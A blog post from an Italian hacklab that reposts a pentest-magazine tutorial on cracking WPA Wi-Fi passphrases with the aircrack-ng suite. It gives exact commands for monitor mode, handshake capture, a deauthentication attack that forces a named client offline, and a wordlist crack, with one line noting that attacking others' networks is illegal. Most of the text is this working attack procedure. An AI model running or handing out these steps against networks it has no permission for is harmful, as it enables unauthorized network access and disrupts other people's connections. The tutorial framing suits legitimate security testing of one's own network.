Under r00t – HackLab Bergamo

Voglio riproporvi 1 dei 2 articoli che qualche mese fa ho scritto per pentest magazine, una rivista che tratta argomenti (come suggerisce il nome) sui test di penetrazione. L’articolo è scritto in un inglese molto semplice e le immagini lasciano poco spazio all’interpretazione, insomma non ci si può sbagliare : ] La distro che ho utilizzato è backbox (c’è il link a destra) ma quel che serve in realtà è solamente la suite di aircrack-ng.

In this article we show you how to crack wpa wireless passphrase with BackBox 2.05

What you will learn…

• you will learn how to capture handshake

• you will learn how to deauthenticate client if needed

• you will learn how to crack passphrase with aircrack-ng

What you should know…

• you have to know (read you MUST know) how to move on Linux system, basic command, for example move trought the Directory, copy/past/remove file or dir

• you have to know (at least the base) how to work aircrack-ng, aireplay-ng, airodump-ng and their options

Choose tagert!

Little note: crack password and penetrate inside not own network is an illegale task. Keep in mind to test security of your own network!

In this step we put our wireless card in monitor mode, to do that open terminal and type:sudo airmon-ng start wlan0

monitor mode

Now we need to start a session of airodump-ng so we can choose appropriate wpa and other useful info: sudo airodump-ng mon0

airodump

this step can be done also with: sudo iwlist wlan0 scan

scansione reti iwlist

info con airodump

this step give us needed info like: essid (network name), bssid (mac address Access Point), client (mac address client) and channel of the network. Now we can start airodump-ng session with appropriate option: sudo airodump-ng –bssid $macadap –channel $AP -w $file $int  for my test: sudo airodump-ng –bssid 4C:54:99:6E:39:F9 –channel 11 -w testwpa mon0

client connessi

where :

• –bssid: mac address access point

• –channel: access point channel

• -w: write dump into a file (testwpa)

• mon0: interface in monitor mode

Now we have to wait someone who connect at AP, but we can also deauthenticate connected client to enforce it to reconnect. To do that we use aireplay-ng: sudo aireplay-ng -0 15 -a $macAP -c $macCLIENT $int for my test: sudo aireplay-ng -0 15 -a 4C:54:99:6E:39:F9 -c 00:25:D3:D7:05:7C mon0

cattura handshake

where:

• -0: option’s aireplay for deauthenticaton attack

• 15: number of deauthentication packet to send

• -a: mac address access point

• -c: mac address connected client

• mon0: interface in monitor mode

As you can see on image, we have detect wpa handshake. The last thing to do, is try to crack passphrase with aircrack and an appropriate wordlist: sudo aircrack-ng -b $macaddAP -w $wordlist $savedwpa.cap for my test: sudo aircrack-ng -b 4C:54:99:6E:39:F9 -w wlist.txt testwpa.cap

ok chiave trovata 😉

where:

• -b: mac address access point

• -w: worlist path

• testwpa.cap: is the file which contain hadshake saved by airodump-ng

That’s all folks!!! Thanx again to all Bbox community!!

Stay united stay hack!! happy hacking && GoVEGetarian

Noyse_dog